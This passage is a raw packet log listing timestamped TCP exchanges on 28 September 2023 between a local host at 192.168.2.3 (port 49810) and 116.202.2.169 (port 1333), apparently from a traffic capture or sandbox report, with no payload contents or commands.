Sep 28, 2023 06:02:00.443917036 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443928957 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443975925 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443984032 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444031954 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444152117 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444204092 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444205046 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444253922 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444261074 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444308996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444335938 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444365025 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444387913 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444412947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444418907 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444472075 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444473982 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444525957 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444526911 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444577932 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444578886 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444607973 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444628000 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444648981 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444660902 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444690943 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444720030 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444741011 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444767952 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444817066 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444818974 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444868088 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444871902 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444921017 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444926977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.444977999 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.444982052 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445034981 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.445036888 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445086002 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.445091009 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445138931 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.445142031 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445171118 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445189953 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.445214987 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.445247889 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445296049 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.445348978 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445377111 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445405006 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.445405006 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445425987 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.445435047 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445449114 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.445485115 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.445491076 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445543051 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.445569992 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445621967 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.445624113 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445673943 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.445677996 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445725918 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.445777893 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445806026 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.445826054 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.445851088 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.446393967 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.446424007 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.446463108 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.446491957 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.446504116 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.446504116 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.446504116 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.446520090 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.446535110 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.446547985 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.446566105 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.446576118 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.446597099 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.446603060 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.446618080 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.446656942 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.446681023 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.446731091 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.446732998 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.446783066 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.446832895 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.446861029 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.446883917 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.446902037 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.446912050 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.446963072 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.446966887 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447017908 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447021008 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447072029 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447073936 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447123051 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447171926 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447221994 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447273016 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447321892 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447375059 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447403908 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447423935 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447433949 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447448015 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447463989 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447480917 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447491884 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447518110 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447535992 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447570086 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447621107 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447623014 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447652102 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447674036 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447691917 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447727919 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447757959 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447783947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447805882 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447809935 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447859049 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447861910 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447911024 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447916031 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.447967052 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.447968960 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.448016882 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.448024988 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.448080063 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.448086977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.448136091 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.448139906 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.448193073 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.448194981 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.448242903 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.448293924 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.448343039 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.448391914 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.448445082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.448446035 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.448496103 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.448544979 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.448600054 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.448651075 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.448679924 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.448708057 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.448739052 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.448760986 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.448791981 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.448813915 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.448832989 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.448868036 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.448915958 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.448920012 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.448971987 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.448978901 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449027061 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449031115 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449079990 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449110031 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449141979 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449163914 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449182034 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449193954 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449243069 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449248075 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449295998 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449311972 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449341059 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449361086 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449382067 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449417114 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449465036 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449470043 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449518919 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449546099 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449574947 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449598074 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449615002 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449650049 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449681997 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449702978 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449721098 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449755907 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449784040 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449804068 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449824095 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449835062 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449881077 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449887991 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449940920 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449944973 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.449995041 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.449999094 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450045109 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.450076103 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450103045 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450124025 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.450130939 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450141907 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.450180054 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.450185061 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450233936 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.450413942 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450485945 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450489998 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.450536013 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.450541019 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450589895 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.450593948 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450623035 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450642109 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.450664043 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.450675011 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450721979 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.450727940 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450774908 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.450825930 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450855017 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450876951 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.450906038 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.450946093 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450995922 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.450999975 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.451045036 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.451072931 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.451107025 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.451118946 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.451148033 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.451210022 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.451261044 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.451313019 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.451360941 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.451376915 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.451421976 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.451457977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.451509953 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.451515913 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.451562881 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.451574087 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.451606989 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.451620102 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.451649904 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.451719046 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.451775074 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.451806068 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.451862097 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.451890945 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.451936007 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.451973915 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.452024937 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.452054977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.452101946 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.452140093 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.452189922 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.452225924 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.452274084 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.452368021 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.452419996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.452444077 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.452491045 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.452508926 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.452557087 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.452629089 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.452697039 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.452706099 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.452754021 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.452950954 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453002930 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453038931 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453088999 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453098059 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453142881 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453180075 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453213930 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453229904 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453259945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453269005 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453313112 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453366041 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453413010 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453429937 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453475952 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453506947 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453540087 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453557968 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453588009 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453597069 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453645945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453699112 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453743935 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453762054 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453794956 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453810930 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453845978 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453846931 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453893900 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453923941 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.453973055 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.453998089 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.454042912 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.454081059 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.454124928 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.454176903 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.454226017 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.454240084 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.454283953 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.454318047 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.454374075 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.454397917 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.454437971 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.454495907 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.454497099 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.454514980 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.454564095 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.454601049 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.454651117 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.454663992 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.454714060 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.454726934 CEST	1333	49810	116.202.2.169	192.168.2.3
